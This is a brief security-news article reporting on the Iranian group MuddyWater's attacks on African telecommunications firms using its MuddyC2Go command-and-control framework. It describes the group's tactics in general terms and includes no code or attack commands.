Cyber Warfare fragments: attacks in Africa with MuddyC2Go
Under the radar: operational tactics and emerging tools of the MuddyWater group
Iranian hacker group MuddyWater has strengthened attacks on telecommunications in Africa, via a new system called MuddyC2Go. This system, managed remotely, facilitates cyber attacks and spreads through phishing emails or by exploiting vulnerabilities in outdated software. MuddyWater will try to remain undetected for as long as possible to achieve its goals.
An Iranian state actor known as MuddyWater has stepped up its attacks against the telecommunications sector in several African countries, employing a new command and control (C2) platform called MuddyC2Go. Also identified as Seedworm, and with other aliases such as Boggy Serpens and Cobalt Ulster, the group allegedly operates under the orders of the Iranian Ministry of Intelligence and Security (MOIS). The attacks are predominantly concentrated in the Middle East but, as reported by the Symantec Threat Hunter Team, have recently spread to Egypt, Sudan and Tanzania.
Features and usage of the MuddyC2Go framework
The MuddyC2Go framework, developed in Golang, was first identified by Deep Instinct as a successor to PhonyC2 and MuddyC3, but there are hints that suggest its use as early as 2020. Although the full breadth of its capabilities is not yet clear , comes with a PowerShell script that facilitates automatic connection to the C2 server managed by Seedworm, thus allowing remote access to the system without manual intervention.
Operational methods in recent attacks
Recent November 2023 assaults have shown the combined use of legitimate tools such as SimpleHelp and Venom Proxy, as well as custom keyloggers and other publicly available tools. MuddyWater's attack chains involve the use of phishing emails and the execution of known vulnerabilities in outdated applications, then continuing with reconnaissance, lateral movement and data collection activities within the victim networks.
MuddyWater's innovation and fulfillment strategy
While mixing proprietary tools, living-off-the-land techniques, and public tools, MuddyWater aims to evade detection to accomplish its strategic goals for as long as possible. Symantec highlights the group's constant innovation and development of its arsenal to remain covert, highlighting heavy use of PowerShell and related scripts as an indicator of suspicious activity. In parallel, an Israel-linked group known as Gonjeshke Darande (“Raider Hawk” in Persian) has claimed cyber sabotage acts affecting most gas stations in Iran, in response to regional aggression by the Islamic Republic and its affiliates .
Follow us on Twitter for more pills like this12/19/2023 12:28
Marco Verro